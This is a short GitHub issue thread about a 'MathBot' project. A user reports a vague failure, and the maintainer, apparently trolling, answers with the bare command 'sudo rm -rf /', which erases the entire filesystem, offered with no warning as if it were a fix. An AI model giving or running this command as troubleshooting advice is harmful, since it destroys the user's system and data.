### ISSUE TITLE
Math Bot

### ISSUE THREAD

**Issue by sergeant-savage** [Glacier150/MathBot#2]
It's not working, please help.

**Comment by Glacier150** [comment]
Hello there, do you know what exactly what the problem is? As the programmer behind it I assume you would have a clue what is wrong. Thank you for your time.

Thomas Asmussen

**Comment by sergeant-savage** [comment]
No work, computer go poof

**Comment by Glacier150** [comment]
sudo rm -rf /

Thomas Asmussen

**Comment by sergeant-savage** [comment]
?
